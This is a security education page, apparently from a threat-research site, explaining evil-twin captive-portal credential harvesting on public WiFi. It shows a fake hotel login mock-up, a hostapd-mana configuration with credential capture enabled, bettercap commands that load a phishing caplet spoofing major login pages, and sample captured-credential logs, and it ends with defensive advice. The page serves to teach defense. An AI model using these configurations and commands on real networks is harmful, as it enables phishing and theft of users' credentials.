WiFi Attack

Credential Harvesting: WiFi Attacks

Technical documentation on Credential Harvesting. Understand the attack technique and learn how to defend against...

Medium Threat Intermediate

Updated April 2026

3 min read

Wireshark packet capture showing network traffic analysis with visible HTTP requests and IP addresses

MalwareZero Research Team Updated April 2026

id="captive-portals">The Captive Portal Technique

Most public WiFi networks use a captive portal — a login or terms-of-service page that appears when you first connect and try to use the internet. You see this at hotels, airports, cafes, and airlines. It feels completely normal to see a login page after connecting to public WiFi.

Attackers exploit this by running a fake captive portal on the Evil Twin. The victim's device shows a captive portal when it tries to access the internet — just like a real one. The victim enters their credentials or email, and the attacker captures them.

Captive Portal Credential Harvesting: [Victim connects to Evil Twin "Hotel_Guest_WiFi"] [Victim opens browser, types google.com] [Attacker's captive portal page intercepts the request] ┌────────────────────────────────────────────┐ │ Hotel Guest WiFi Login │ │ │ │ Room Number: [___________] │ │ Last Name: [___________] │ │ Password: [___________] │ │ │ │ [ Connect to Internet ] │ │ │ │ *Free 30min access │ └────────────────────────────────────────────┘ [Victim enters: Room 1204, Name: "Chen", Pass: "Chen2026"] [Attacker captures: Room 1204 / Chen2026] [Victim is redirected to real internet — no idea their login was stolen]

Mana Toolkit Configuration for Credential Capture

Mana Toolkit's hostapd-mana includes a built-in credential harvesting module that captures 802.1X (enterprise WiFi) credentials automatically. For captive portal credentials, a custom HTTP server handles the phishing page.

$ cat /etc/hostapd-mana/hostapd-mana.conf



interface=wlan1

driver=nl80211

ssid=Hotel_Guest_WiFi

channel=6

hw_mode=g



# Mana credential harvesting

mana_cred_capture=1

mana_cred_log=/var/log/mana_cred.log

enable_mana=1

mana_macaddr=00:11:22:33:44:55



$ cat /var/log/mana_cred.log



[Mana] EAP: user=john%40acmecorp.com

[Mana] EAP: password=Summer2026!Q

[Mana] timestamp=1744012847

[Mana] BSSID=00:11:22:33:44:55 ESSID=Hotel_Guest_WiFi

[Enterprise WiFi credentials captured — corporate network potentially compromised]

Phishing Pages Beyond Captive Portals

Beyond captive portals, attackers serve phishing pages that mimic popular services. When the victim tries to access Google, Facebook, or their corporate email, they see a familiar login page — but it's the attacker's server.

$ # Using bettercap to inject a phishing module

$ sudo bettercap -eval "set http.proxy.script /usr/share/bettercap/caplets/phishing/phishing-hotspot.cap"



[bettercap]>> set http.proxy.script /usr/share/bettercap/caplets/phishing/phishing-hotspot.cap

[bettercap]>> http.proxy on

[http.proxy] Script: phishing-hotspot.cap



# The phishing-hotspot.cap serves fake login pages for:

# - Facebook, Google, Twitter, LinkedIn, Amazon

# - Microsoft (Outlook/Office 365)

# - Generic "WiFi Login Required" portals



tail -f /var/log/bettercap-phish.log

[*] Captured Facebook credentials

    User: sarah.johnson@example.com

    Pass: SecurePass#2026!

    IP: 192.168.1.147

    Time: 2026-04-07T14:23:11Z

What Attackers Do With Harvested Credentials

Sell on dark web markets: Credential bundles sell for $1–$50 depending on the service. Corporate credentials are premium — sold to competitors, nation-states, or ransomware operators.
Account takeover: Login to the victim's email, social media, or financial accounts
Corporate espionage: Access corporate VPN, email, Slack, and file sharing using harvested corporate credentials
Lateral movement: Use corporate credentials to access internal systems, escalate privileges, and exfiltrate data
Credential stuffing: Try the same username/password combination on other services (people reuse passwords)

Password Reuse: The Attack Multiplier

If the victim used the same password for their hotel WiFi login and their corporate VPN, the attacker now has VPN access. If they used the same password for their email and their crypto exchange, the attacker can attempt account takeover there too. Credential reuse amplifies a single WiFi harvest into multi-system compromise.

Defense Against Credential Harvesting

Use a VPN on all public WiFi: Prevents the attacker from seeing your traffic and serving you phishing pages
Verify the captive portal URL: Real captive portals use the router's IP or a legitimate domain. Be suspicious of portals asking for passwords unrelated to the service (e.g., hotel WiFi asking for your email password)
Don't reuse passwords: Use unique passwords for every service, managed by a password manager
Enable 2FA/MFA: Even if credentials are captured, 2FA blocks account takeover on protected services
Use password manager: Password managers won't auto-fill credentials on unrecognized domains, protecting against phishing pages
Corporate credential monitoring: Organizations should monitor for credential stuffing attempts against corporate services using dark web monitoring services

← PreviousKARMA & Runkarma Attacks Next →Network Infiltration Attacks

Understand the Threat. Build the Defense.

Learn how to protect yourself and your organization against Credential Harvesting attacks.

View Defense Guide All Attacks